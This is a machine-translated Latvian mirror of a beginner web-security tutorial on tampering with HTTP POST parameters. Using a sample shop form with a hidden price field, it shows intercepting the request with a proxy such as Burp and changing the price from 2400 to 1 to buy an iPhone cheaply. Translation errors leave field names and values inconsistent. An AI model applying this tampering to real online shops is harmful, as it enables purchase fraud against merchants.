Šis raksts ir mašīntulkošanas spoguļraksts, lūdzu, noklikšķiniet šeit, lai pārietu uz oriģinālo rakstu.

Architect_Programmer_Code Lauksaimniecības tīkls»Arhitekts Citas tehnoloģijas Drošs uzbrukums un aizsardzība Ielaušanās iekļūšana: HTTP galveņu lietošana
Skats: 12586|Atbildi: 0

[Drošības apmācība] Ielaušanās iekļūšana: HTTP galveņu lietošana

[Kopēt saiti]
Publicēts 07.02.2015 17:59:07 | | |

Par HTTP galveņu lietošanu

http galvene parasti tiek izmantota vietņu pārraides mehānismā, taču lielākā daļa iesācēju Ķīnā šo gabalu nav pamanījuši, šis raksts ir veltīts tikai iesācējiem, http galvenes loma ielaušanās procesā.

Izmantojiet iepirkšanās lapu kā piemēru, lai analizētu nelielu daļu no HTTP galveņu lomas.

Vispirms analizēsim veidlapu iepirkšanās lapā.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<input type="hidden" name="price" value="449">

<input type="submit" value="Pirkt">

</form>

Atvēršanas procesa laikā uzņemiet ekrānuzņēmumu no viņa http ziņojuma galvenes un apskatiet

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

daudzums=1&cena=2400

Lai gan cenu lauks netiek parādīts lapā, atverot iepirkšanās lapu, lietotājs to joprojām var rediģēt un izmantot.

Ir divi veidi, kā panākt rediģēšanu

1. Saglabājiet HTML avota kodu modificēšanai un pēc tam atkārtoti ielādējiet to pārlūkprogrammā, lai palaistu

2. Izmantojiet starpniekservera pārtveršanu, lai modificētu HTTP galvenes (starpniekservera konstrukcija rīka burpā)

Kā piemēru ņemiet iepriekš minēto HTTP galveni
Pirms izmaiņām
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

daudzums=1&cena=2400

Pēc izmaiņām
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

daudzums=1&cena=1


Pēdējā rindā laukā Cenas vērtība ir 2400, un, ja mēs to mainām uz 1, mēs varam iegūt iPhone 4S par lētāku cenu.

Šis raksts sniedz tikai priekšstatu par negaidītiem ieguvumiem, piemēram, LDAP injekciju.




Iepriekšējo:MySQL aizmirsa paroles atgūšanas paroles ieviešanas metode
Nākamo:SQL injekcija, lai iegūtu pilnu vietnes ceļu

Saistītās ziņas
Atruna:
Visa programmatūra, programmēšanas materiāli vai raksti, ko publicē Code Farmer Network, ir paredzēti tikai mācību un pētniecības mērķiem; Iepriekš minēto saturu nedrīkst izmantot komerciāliem vai nelikumīgiem mērķiem, pretējā gadījumā lietotājiem ir jāuzņemas visas sekas. Informācija šajā vietnē nāk no interneta, un autortiesību strīdiem nav nekāda sakara ar šo vietni. Iepriekš minētais saturs ir pilnībā jāizdzēš no datora 24 stundu laikā pēc lejupielādes. Ja jums patīk programma, lūdzu, atbalstiet oriģinālu programmatūru, iegādājieties reģistrāciju un iegūstiet labākus oriģinālus pakalpojumus. Ja ir kādi pārkāpumi, lūdzu, sazinieties ar mums pa e-pastu.
Mail To:help@itsvse.com